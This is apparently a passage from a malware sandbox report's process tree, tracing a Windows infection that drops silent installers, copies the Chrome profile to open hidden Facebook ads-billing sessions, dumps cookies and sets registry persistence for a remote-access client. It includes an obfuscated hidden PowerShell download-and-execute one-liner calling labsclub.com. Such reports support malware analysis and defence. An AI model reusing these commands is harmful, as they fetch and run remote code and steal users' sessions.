        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1676,4229733645907097826,12475621296103354330,131072 --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1644 /prefetch:2
        19⤵
        
        PID:9080
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1676,4229733645907097826,12475621296103354330,131072 --lang=en-US --service-sandbox-type=utility --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --mojo-platform-channel-handle=2248 /prefetch:8
        19⤵
        
        PID:5072
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1676,4229733645907097826,12475621296103354330,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2872 /prefetch:1
        19⤵
        
        PID:8408
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1676,4229733645907097826,12475621296103354330,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2852 /prefetch:1
        19⤵
        
        PID:4376
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1676,4229733645907097826,12475621296103354330,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3316 /prefetch:1
        19⤵
        
        PID:9256
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1676,4229733645907097826,12475621296103354330,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3192 /prefetch:1
        19⤵
        
        PID:9420
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1676,4229733645907097826,12475621296103354330,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3588 /prefetch:1
        19⤵
        
        PID:9076
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1676,4229733645907097826,12475621296103354330,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3860 /prefetch:1
        19⤵
        
        PID:4484
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1676,4229733645907097826,12475621296103354330,131072 --lang=en-US --service-sandbox-type=utility --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --mojo-platform-channel-handle=5268 /prefetch:8
        19⤵
        
        PID:11032
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1676,4229733645907097826,12475621296103354330,131072 --lang=en-US --service-sandbox-type=none --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --mojo-platform-channel-handle=5420 /prefetch:8
        19⤵
        
        PID:4968
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX3\Full Program Features.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RarSFX3\Full Program Features.exe"
        17⤵
        
        PID:4680
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Program Files\unins.vbs"
        18⤵
        
        PID:6548
        
        C:\Windows\SysWOW64\rundll32.exe
        
        "C:\Windows\System32\rundll32.exe" "C:\Program Files\unins0000.dll",install
        19⤵
        
        PID:10372
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX3\file.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RarSFX3\file.exe"
        17⤵
        
        PID:2152
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\5k515t2s.0lg\app.exe /8-2222 & exit
        15⤵
        
        PID:6484
        
        C:\Users\Admin\AppData\Local\Temp\5k515t2s.0lg\app.exe
        
        C:\Users\Admin\AppData\Local\Temp\5k515t2s.0lg\app.exe /8-2222
        16⤵
        
        PID:7916
        
        C:\Users\Admin\AppData\Local\Temp\5k515t2s.0lg\app.exe
        
        "C:\Users\Admin\AppData\Local\Temp\5k515t2s.0lg\app.exe" /8-2222
        17⤵
        
        PID:8168
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\qp4axr3c.ult\Four.exe & exit
        15⤵
        
        PID:8132
        
        C:\Users\Admin\AppData\Local\Temp\qp4axr3c.ult\Four.exe
        
        C:\Users\Admin\AppData\Local\Temp\qp4axr3c.ult\Four.exe
        16⤵
        
        PID:8168
        
        C:\Users\Admin\AppData\Local\Temp\8C4DLGN8JT\multitimer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\8C4DLGN8JT\multitimer.exe" 0 306033e7ac94ccd3.87625057 0 104
        17⤵
        
        PID:8784
        
        C:\Users\Admin\AppData\Local\Temp\8C4DLGN8JT\multitimer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\8C4DLGN8JT\multitimer.exe" 1 3.1617574336.606a39c0065ad 104
        18⤵
        
        PID:9340
        
        C:\Users\Admin\AppData\Local\Temp\8C4DLGN8JT\multitimer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\8C4DLGN8JT\multitimer.exe" 2 3.1617574336.606a39c0065ad
        19⤵
        
        PID:9664
        
        C:\Users\Admin\AppData\Local\Temp\orre5qnkd5v\fo0ki2uy54w.exe
        
        "C:\Users\Admin\AppData\Local\Temp\orre5qnkd5v\fo0ki2uy54w.exe" /ustwo INSTALL
        20⤵
        
        PID:7212
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c taskkill /im "fo0ki2uy54w.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\orre5qnkd5v\fo0ki2uy54w.exe" & exit
        21⤵
        
        PID:8680
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /im "fo0ki2uy54w.exe" /f
        22⤵
        Kills process with taskkill
        
        PID:5900
        
        C:\Users\Admin\AppData\Local\Temp\2w2ach4x0rf\Setup3310.exe
        
        "C:\Users\Admin\AppData\Local\Temp\2w2ach4x0rf\Setup3310.exe" /Verysilent /subid=577
        20⤵
        
        PID:7684
        
        C:\Users\Admin\AppData\Local\Temp\is-QLG98.tmp\Setup3310.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-QLG98.tmp\Setup3310.tmp" /SL5="$20966,138429,56832,C:\Users\Admin\AppData\Local\Temp\2w2ach4x0rf\Setup3310.exe" /Verysilent /subid=577
        21⤵
        
        PID:1860
        
        C:\Users\Admin\AppData\Local\Temp\is-3L3JR.tmp\Setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\is-3L3JR.tmp\Setup.exe" /Verysilent
        22⤵
        
        PID:4728
        
        C:\Users\Admin\AppData\Local\Temp\rqfoalpumup\cpyrix.exe
        
        "C:\Users\Admin\AppData\Local\Temp\rqfoalpumup\cpyrix.exe" /VERYSILENT
        20⤵
        
        PID:9596
        
        C:\Users\Admin\AppData\Roaming\1.exe
        
        C:\Users\Admin\AppData\Roaming\1.exe
        21⤵
        
        PID:10976
        
        C:\Users\Admin\AppData\Roaming\1.exe
        
        "{path}"
        22⤵
        
        PID:2080
        
        C:\Users\Admin\AppData\Roaming\1.exe
        
        "{path}"
        22⤵
        
        PID:5944
        
        C:\Users\Admin\AppData\Roaming\2.exe
        
        C:\Users\Admin\AppData\Roaming\2.exe
        21⤵
        
        PID:11244
        
        C:\Users\Admin\AppData\Roaming\2.exe
        
        "{path}"
        22⤵
        
        PID:8424
        
        C:\Users\Admin\AppData\Local\Temp\h0u5443snku\vict.exe
        
        "C:\Users\Admin\AppData\Local\Temp\h0u5443snku\vict.exe" /VERYSILENT /id=535
        20⤵
        
        PID:8956
        
        C:\Users\Admin\AppData\Local\Temp\is-1AFJB.tmp\vict.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-1AFJB.tmp\vict.tmp" /SL5="$30804,870426,780800,C:\Users\Admin\AppData\Local\Temp\h0u5443snku\vict.exe" /VERYSILENT /id=535
        21⤵
        
        PID:9184
        
        C:\Users\Admin\AppData\Local\Temp\is-C1EC4.tmp\win1host.exe
        
        "C:\Users\Admin\AppData\Local\Temp\is-C1EC4.tmp\win1host.exe" 535
        22⤵
        
        PID:10676
        
        C:\Users\Admin\AppData\Local\Temp\dmepdzrc2ug\app.exe
        
        "C:\Users\Admin\AppData\Local\Temp\dmepdzrc2ug\app.exe" /8-23
        20⤵
        
        PID:5952
        
        C:\Users\Admin\AppData\Local\Temp\ZKVXQ8YYJ7\setups.exe
        
        "C:\Users\Admin\AppData\Local\Temp\ZKVXQ8YYJ7\setups.exe" ll
        17⤵
        
        PID:8344
        
        C:\Users\Admin\AppData\Local\Temp\is-3830M.tmp\setups.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-3830M.tmp\setups.tmp" /SL5="$803D2,454998,229376,C:\Users\Admin\AppData\Local\Temp\ZKVXQ8YYJ7\setups.exe" ll
        18⤵
        
        PID:8880
        
        C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\RunWW.exe
        
        "C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\RunWW.exe"
        11⤵
        
        PID:1348
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1348 -s 948
        12⤵
        Program crash
        
        PID:7564
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1348 -s 1004
        12⤵
        Program crash
        
        PID:4576
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1348 -s 1012
        12⤵
        Program crash
        
        PID:6192
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1348 -s 1176
        12⤵
        Program crash
        
        PID:7416
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1348 -s 1188
        12⤵
        Program crash
        
        PID:6968
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1348 -s 1204
        12⤵
        Program crash
        
        PID:7780
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1348 -s 1536
        12⤵
        Program crash
        
        PID:7236
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1348 -s 1556
        12⤵
        Program crash
        
        PID:6324
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1348 -s 1764
        12⤵
        Program crash
        
        PID:7216
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1348 -s 1792
        12⤵
        Program crash
        
        PID:7904
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1348 -s 1704
        12⤵
        Program crash
        
        PID:8048
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1348 -s 1864
        12⤵
        Program crash
        
        PID:8112
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1348 -s 856
        12⤵
        Program crash
        
        PID:4616
        
        C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\hjjgaa.exe
        
        "C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\hjjgaa.exe"
        11⤵
        
        PID:3816
        
        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
        
        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
        12⤵
        
        PID:6524
        
        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
        
        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
        12⤵
        
        PID:6280
        
        C:\Users\Admin\AppData\Local\Temp\3xlqlf1hx5d\3diiluoqpip.exe
        
        "C:\Users\Admin\AppData\Local\Temp\3xlqlf1hx5d\3diiluoqpip.exe" /ustwo INSTALL
        8⤵
        Executes dropped EXE
        
        PID:2304
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c taskkill /im "3diiluoqpip.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\3xlqlf1hx5d\3diiluoqpip.exe" & exit
        9⤵
        
        PID:6480
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /im "3diiluoqpip.exe" /f
        10⤵
        Kills process with taskkill
        
        PID:6864
        
        C:\Users\Admin\AppData\Local\Temp\hyfndkpv1wk\cpyrix.exe
        
        "C:\Users\Admin\AppData\Local\Temp\hyfndkpv1wk\cpyrix.exe" /VERYSILENT
        8⤵
        Executes dropped EXE
        
        PID:3824
        
        C:\Users\Admin\AppData\Roaming\1.exe
        
        C:\Users\Admin\AppData\Roaming\1.exe
        9⤵
        
        PID:4424
        
        C:\Users\Admin\AppData\Roaming\1.exe
        
        "{path}"
        10⤵
        
        PID:4512
        
        C:\Users\Admin\AppData\Roaming\2.exe
        
        C:\Users\Admin\AppData\Roaming\2.exe
        9⤵
        
        PID:5568
        
        C:\Users\Admin\AppData\Roaming\2.exe
        
        "{path}"
        10⤵
        
        PID:5060
        
        C:\Users\Admin\AppData\Local\Temp\tqrymauscas\vict.exe
        
        "C:\Users\Admin\AppData\Local\Temp\tqrymauscas\vict.exe" /VERYSILENT /id=535
        8⤵
        Executes dropped EXE
        
        PID:4660
        
        C:\Users\Admin\AppData\Local\Temp\is-1FLB7.tmp\vict.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-1FLB7.tmp\vict.tmp" /SL5="$A0030,870426,780800,C:\Users\Admin\AppData\Local\Temp\tqrymauscas\vict.exe" /VERYSILENT /id=535
        9⤵
        Executes dropped EXE
        Loads dropped DLL
        
        PID:584
        
        C:\Users\Admin\AppData\Local\Temp\is-KFD5S.tmp\win1host.exe
        
        "C:\Users\Admin\AppData\Local\Temp\is-KFD5S.tmp\win1host.exe" 535
        10⤵
        
        PID:5840
        
        C:\Users\Admin\AppData\Local\Temp\VJ14zVcsK.exe
        
        "C:\Users\Admin\AppData\Local\Temp\VJ14zVcsK.exe"
        11⤵
        
        PID:3880
        
        C:\Windows\SysWOW64\at.exe
        
        "C:\Windows\System32\at.exe"
        12⤵
        
        PID:6028
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c C:\Windows\System32\cmd.exe < Marito.gif
        12⤵
        
        PID:7004
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\System32\cmd.exe
        13⤵
        
        PID:4152
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c start /B powershell -windowstyle hidden -command "&{$t='#i#ex##@(n#ew#####-#ob#jec#t N#et#.W#eb#Cl#ie#nt#).###########Up#loa#dSt##########ri#ng(#''h#t#tp#:#//labsclub.com/#w#el#co#me''#,#''Cr#ys#ta#lP#ig''#############)##|#ie##x'.replace('#','').split('@',5);&$t[0]$t[1]}"
        11⤵
        
        PID:4104
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -windowstyle hidden -command "&{$t='#i#ex##@(n#ew#####-#ob#jec#t N#et#.W#eb#Cl#ie#nt#).###########Up#loa#dSt##########ri#ng(#''h#t#tp#:#//labsclub.com/#w#el#co#me''#,#''Cr#ys#ta#lP#ig''#############)##|#ie##x'.replace('#','').split('@',5);&$t[0]$t[1]}"
        12⤵
        
        PID:8436
        
        C:\Users\Admin\AppData\Local\Temp\403nmoa1hhy\xoay010cepb.exe
        
        "C:\Users\Admin\AppData\Local\Temp\403nmoa1hhy\xoay010cepb.exe"
        8⤵
        Executes dropped EXE
        
        PID:3900
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\403nmoa1hhy\xoay010cepb.exe"
        9⤵
        
        PID:5960
        
        C:\Windows\SysWOW64\PING.EXE
        
        ping 1.1.1.1 -n 1 -w 3000
        10⤵
        Runs ping.exe
        
        PID:5156
        
        C:\Users\Admin\AppData\Local\Temp\0xrx5wvo5wy\app.exe
        
        "C:\Users\Admin\AppData\Local\Temp\0xrx5wvo5wy\app.exe" /8-23
        8⤵
        Executes dropped EXE
        
        PID:2260
        
        C:\Users\Admin\AppData\Local\Temp\0xrx5wvo5wy\app.exe
        
        "C:\Users\Admin\AppData\Local\Temp\0xrx5wvo5wy\app.exe" /8-23
        9⤵
        
        PID:3728
        
        C:\Users\Admin\AppData\Local\Temp\gthunqzjlou\vpn.exe
        
        "C:\Users\Admin\AppData\Local\Temp\gthunqzjlou\vpn.exe" /silent /subid=482
        8⤵
        Executes dropped EXE
        
        PID:5012
        
        C:\Users\Admin\AppData\Local\Temp\is-CT7JJ.tmp\vpn.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-CT7JJ.tmp\vpn.tmp" /SL5="$20460,15170975,270336,C:\Users\Admin\AppData\Local\Temp\gthunqzjlou\vpn.exe" /silent /subid=482
        9⤵
        Executes dropped EXE
        Loads dropped DLL
        Drops file in Program Files directory
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of FindShellTrayWindow
        
        PID:5160
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\uninstall.bat" "
        10⤵
        
        PID:5828
        
        C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe
        
        tapinstall.exe remove tap0901
        11⤵
        
        PID:2864
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\install.bat" "
        10⤵
        
        PID:1668
        
        C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe
        
        tapinstall.exe install OemVista.inf tap0901
        11⤵
        
        PID:6500
        
        C:\Program Files (x86)\MaskVPN\mask_svc.exe
        
        "C:\Program Files (x86)\MaskVPN\mask_svc.exe" uninstall
        10⤵
        
        PID:6404
        
        C:\Program Files (x86)\MaskVPN\mask_svc.exe
        
        "C:\Program Files (x86)\MaskVPN\mask_svc.exe" install
        10⤵
        
        PID:6668
        
        C:\Users\Admin\AppData\Local\Temp\rs1mjuwh0io\IBInstaller_97039.exe
        
        "C:\Users\Admin\AppData\Local\Temp\rs1mjuwh0io\IBInstaller_97039.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs97039 -token mtn1co3fo4gs5vwq
        8⤵
        Executes dropped EXE
        
        PID:5192
        
        C:\Users\Admin\AppData\Local\Temp\is-USH47.tmp\IBInstaller_97039.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-USH47.tmp\IBInstaller_97039.tmp" /SL5="$1049A,14575459,721408,C:\Users\Admin\AppData\Local\Temp\rs1mjuwh0io\IBInstaller_97039.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs97039 -token mtn1co3fo4gs5vwq
        9⤵
        Executes dropped EXE
        Loads dropped DLL
        Drops file in Program Files directory
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of FindShellTrayWindow
        
        PID:5228
        
        C:\Windows\SysWOW64\cmd.exe
        
        "cmd.exe" /c expand C:\Users\Admin\AppData\Local\Temp\is-4Q4NO.tmp\{app}\microsoft.cab -F:* %ProgramData%
        10⤵
        
        PID:5504
        
        C:\Windows\SysWOW64\expand.exe
        
        expand C:\Users\Admin\AppData\Local\Temp\is-4Q4NO.tmp\{app}\microsoft.cab -F:* C:\ProgramData
        11⤵
        
        PID:5572
        
        C:\Windows\SysWOW64\cmd.exe
        
        "cmd.exe" /c start http://egypthistoricart.online/pgudonqntu/zmsaksepfx.php?xdl=mtn1co3fo4gs5vwq^&cid=97039^&param=
        10⤵
        
        PID:6932
        
        C:\ProgramData\regid.1993-06.com.microsoft\client32.exe
        
        "C:\ProgramData\regid.1993-06.com.microsoft\client32.exe"
        10⤵
        
        PID:6868
        
        C:\Windows\SysWOW64\cmd.exe
        
        "cmd.exe" reg add "HKEY_CURRENT_USER\Environment" /v UserInitMprLogonScript /t REG_EXPAND_SZ /d "%ProgramData%\regid.1993-06.com.microsoft\client32.exe" /f
        10⤵
        
        PID:6504
        
        C:\Users\Admin\AppData\Local\Temp\v5vxshagcgn\c0kjmtsswjd.exe
        
        "C:\Users\Admin\AppData\Local\Temp\v5vxshagcgn\c0kjmtsswjd.exe" /quiet SILENT=1 AF=756
        8⤵
        Executes dropped EXE
        Loads dropped DLL
        Suspicious use of FindShellTrayWindow
        
        PID:5264
        
        C:\Windows\SysWOW64\msiexec.exe
        
        "C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\Weather\Weather 1.0.0\install\FD7DF1F\Weather Installation.msi" /quiet SILENT=1 AF=756 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\v5vxshagcgn\c0kjmtsswjd.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\v5vxshagcgn\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1617322015 /quiet SILENT=1 AF=756 " AF="756" AI_CONTROL_VISUAL_STYLE="16578540;16578540;14988840;12422912"
        9⤵
        
        PID:6768
    - - C:\Users\Admin\AppData\Local\Temp\L576TR96Z6\setups.exe
        
        "C:\Users\Admin\AppData\Local\Temp\L576TR96Z6\setups.exe" ll
        5⤵
        Executes dropped EXE
        
        PID:4804
      - C:\Users\Admin\AppData\Local\Temp\is-0O8PP.tmp\setups.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-0O8PP.tmp\setups.tmp" /SL5="$40084,454998,229376,C:\Users\Admin\AppData\Local\Temp\L576TR96Z6\setups.exe" ll
        6⤵
        Executes dropped EXE
        Checks computer location settings
        Loads dropped DLL
        Suspicious behavior: EnumeratesProcesses
        
        PID:4136
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX1\askinstall20.exe
      "C:\Users\Admin\AppData\Local\Temp\RarSFX1\askinstall20.exe"
      4⤵
      Executes dropped EXE
      Drops Chrome extension
      Suspicious use of AdjustPrivilegeToken
      PID:4100
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c taskkill /f /im chrome.exe
        5⤵
        
        PID:4144
      - C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /f /im chrome.exe
        6⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:4444
    - - C:\Windows\SysWOW64\xcopy.exe
        
        xcopy "C:\Users\Admin\AppData\Local\Google\Chrome\User Data" "C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99\" /s /e /y
        5⤵
        Enumerates system info in registry
        
        PID:184
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --window-position=-50000,-50000 --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" https://www.facebook.com/ https://www.facebook.com/pages/ https://secure.facebook.com/ads/manager/account_settings/account_billing/
        5⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of FindShellTrayWindow
        
        PID:204
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler --user-data-dir=C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99 /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99\Crashpad --metrics-dir=C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99 --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=86.0.4240.111 --initial-client-data=0xd4,0xd8,0xdc,0xb0,0xe0,0x7ffa3f846e00,0x7ffa3f846e10,0x7ffa3f846e20
        6⤵
        
        PID:576
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1576,15653010567113625077,16760943654270308388,131072 --lang=en-US --service-sandbox-type=network --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --mojo-platform-channel-handle=1684 /prefetch:8
        6⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:3820
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1576,15653010567113625077,16760943654270308388,131072 --lang=en-US --service-sandbox-type=utility --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --mojo-platform-channel-handle=2176 /prefetch:8
        6⤵
        
        PID:4440
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1576,15653010567113625077,16760943654270308388,131072 --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1636 /prefetch:2
        6⤵
        
        PID:1124
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1576,15653010567113625077,16760943654270308388,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2792 /prefetch:1
        6⤵
        
        PID:1516
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1576,15653010567113625077,16760943654270308388,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2784 /prefetch:1
        6⤵
        
        PID:4896
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1576,15653010567113625077,16760943654270308388,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3280 /prefetch:1
        6⤵
        
        PID:4376
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1576,15653010567113625077,16760943654270308388,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3180 /prefetch:1
        6⤵
        
        PID:4648
